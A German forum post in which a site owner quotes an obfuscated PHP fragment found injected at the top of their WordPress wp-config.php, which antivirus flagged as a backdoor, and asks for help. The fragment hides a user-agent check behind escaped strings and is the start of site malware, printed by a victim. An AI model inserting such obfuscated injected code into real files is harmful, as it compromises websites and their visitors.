Hi
in meiner wp-config.php findeich am Anfang dieses:
Zitat<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php
Der eigentliche Code ist wesentlich länger, aber mein Avast hat beim Speichern dieses Texte eine Backdoor erkannt....
Offensichtlich ist diese Webseite gehacked worden.
Ist dazu irgendwas bekannt? Mein provider hat erstmal alles gesperrt so daß da nix mehr passieren soll.
Interessant wäre auch, ob bekannt ist, ob weitere .php-Dateien in der Installation betroffen sein könnten...